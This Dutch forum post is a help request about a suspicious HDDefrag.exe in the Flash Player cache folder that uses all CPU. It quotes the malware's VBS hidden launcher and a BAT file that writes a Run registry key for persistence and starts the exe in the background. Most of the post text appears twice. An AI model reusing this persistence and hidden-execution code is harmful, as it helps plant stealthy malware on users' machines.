Op mijn pc had ik het bestand HDDefrag.exe staan welke 100% van mijn CPU (i5 3570k) gebruikt. Op Google heb ik gezocht naar wat dit bestand/virus/programma precies doet, maar kon hier niet echt een antwoord op vinden.
Hieronder een screenshot welke misschien meer duidelijkheid geeft.
De bestandslocatie van HDDefrag is:
C:\Users\<gebruiker>\AppData\Roaming\Adobe\Flash Player\File Cache
Ook is er een BAT en een VBS bestand aanwezig, waarvan de code hieronder staat
file.vbs
hddef.bat
Ik heb met malwarebytes en Microsoft Security Essentials op virussen gescanned echter hebben deze scanners geen infecties gevonden.
Kan ik gewoon de register opstartsleutel verwijderen inclusief de bestanden of blijft er dan nog iets achter?
Zijn mijn wachtwoorden nog veilig en weet iemand wat dit programma doet?
Hieronder een screenshot welke misschien meer duidelijkheid geeft.
De bestandslocatie van HDDefrag is:
C:\Users\<gebruiker>\AppData\Roaming\Adobe\Flash Player\File Cache
Ook is er een BAT en een VBS bestand aanwezig, waarvan de code hieronder staat
file.vbs
code:
1
| CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False |
hddef.bat
code:
1
2
3
| @echo off %windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v HDDefrag /d "wscript \"%appdata%\Adobe\Flash Player\File Cache\file.vbs\" \"%appdata%\Adobe\Flash Player\File Cache\hddef.bat\"" /f start /b /normal "a" "%appdata%\Adobe\Flash Player\File Cache\HDDefrag.exe" |
Ik heb met malwarebytes en Microsoft Security Essentials op virussen gescanned echter hebben deze scanners geen infecties gevonden.
Kan ik gewoon de register opstartsleutel verwijderen inclusief de bestanden of blijft er dan nog iets achter?
Zijn mijn wachtwoorden nog veilig en weet iemand wat dit programma doet?
:strip_icc():strip_exif()/u/21247/oranje.jpg?f=community)
:strip_icc():strip_exif()/u/22063/DodgeViper3.jpg?f=community)
:strip_exif()/u/146978/Kirby_run_anim.gif?f=community)